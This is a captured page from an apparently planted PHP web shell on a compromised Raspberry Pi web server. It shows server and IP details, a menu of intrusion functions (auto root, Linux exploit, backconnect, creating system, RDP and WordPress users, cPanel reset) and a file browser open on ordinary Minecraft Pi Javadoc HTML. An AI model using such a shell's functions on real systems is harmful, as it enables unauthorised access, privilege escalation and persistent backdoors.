Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
minecraft-pi /
api /
java /
doc /
pi /
[ HOME SHELL ]
Name
Size
Permission
Action
class-use
[ DIR ]
drwxr-xr-x
event
[ DIR ]
drwxr-xr-x
tool
[ DIR ]
drwxr-xr-x
Block.html
44.38
KB
-rw-r--r--
Color.html
11.34
KB
-rw-r--r--
Item.html
31.82
KB
-rw-r--r--
Minecraft.Camera.html
6.15
KB
-rw-r--r--
Minecraft.Entities.html
5.72
KB
-rw-r--r--
Minecraft.Events.html
4.34
KB
-rw-r--r--
Minecraft.Player.html
6.41
KB
-rw-r--r--
Minecraft.html
19.75
KB
-rw-r--r--
Vec.Unit.html
7.46
KB
-rw-r--r--
Vec.html
11.75
KB
-rw-r--r--
VecFloat.html
10.23
KB
-rw-r--r--
package-frame.html
1.41
KB
-rw-r--r--
package-summary.html
2.61
KB
-rw-r--r--
package-use.html
6.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Minecraft.Events.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> Minecraft.Events (Minecraft Pi Edition, Java API) </TITLE> <META NAME="date" CONTENT="2019-05-07"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Minecraft.Events (Minecraft Pi Edition, Java API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <HR> <!-- ======== START OF CLASS DATA ======== --> <H2> <FONT SIZE="-1"> pi</FONT> <BR> Class Minecraft.Events</H2> <PRE> Object <IMG SRC="../resources/inherit.gif" ALT="extended by "><B>pi.Minecraft.Events</B> </PRE> <DL> <DT><B>Enclosing class:</B><DD><A HREF="../pi/Minecraft.html" title="class in pi">Minecraft</A></DD> </DL> <HR> <DL> <DT><PRE>public class <B>Minecraft.Events</B><DT>extends Object</DL> </PRE> <P> Events <P> <P> <HR> <P> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <A NAME="constructor_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Constructor Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE><B><A HREF="../pi/Minecraft.Events.html#Minecraft.Events()">Minecraft.Events</A></B>()</CODE> <BR> </TD> </TR> </TABLE> <!-- ========== METHOD SUMMARY =========== --> <A NAME="method_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Method Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE> void</CODE></FONT></TD> <TD><CODE><B><A HREF="../pi/Minecraft.Events.html#clearAll()">clearAll</A></B>()</CODE> <BR> Clear all old events</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE> List<<A HREF="../pi/event/BlockHitEvent.html" title="class in pi.event">BlockHitEvent</A>></CODE></FONT></TD> <TD><CODE><B><A HREF="../pi/Minecraft.Events.html#pollBlockHits()">pollBlockHits</A></B>()</CODE> <BR> Only triggered by sword</TD> </TR> </TABLE> <A NAME="methods_inherited_from_class_Object"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left"><B>Methods inherited from class Object</B></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</CODE></TD> </TR> </TABLE> <P> <!-- ========= CONSTRUCTOR DETAIL ======== --> <A NAME="constructor_detail"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2"> <B>Constructor Detail</B></FONT></TH> </TR> </TABLE> <A NAME="Minecraft.Events()"><!-- --></A><H3> Minecraft.Events</H3> <PRE> public <B>Minecraft.Events</B>()</PRE> <DL> </DL> <!-- ============ METHOD DETAIL ========== --> <A NAME="method_detail"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2"> <B>Method Detail</B></FONT></TH> </TR> </TABLE> <A NAME="clearAll()"><!-- --></A><H3> clearAll</H3> <PRE> public void <B>clearAll</B>()</PRE> <DL> <DD>Clear all old events <P> <DD><DL> </DL> </DD> </DL> <HR> <A NAME="pollBlockHits()"><!-- --></A><H3> pollBlockHits</H3> <PRE> public List<<A HREF="../pi/event/BlockHitEvent.html" title="class in pi.event">BlockHitEvent</A>> <B>pollBlockHits</B>()</PRE> <DL> <DD>Only triggered by sword <P> <DD><DL> </DL> </DD> </DL> <!-- ========= END OF CLASS DATA ========= --> <HR> <HR> </BODY> </HTML>
Close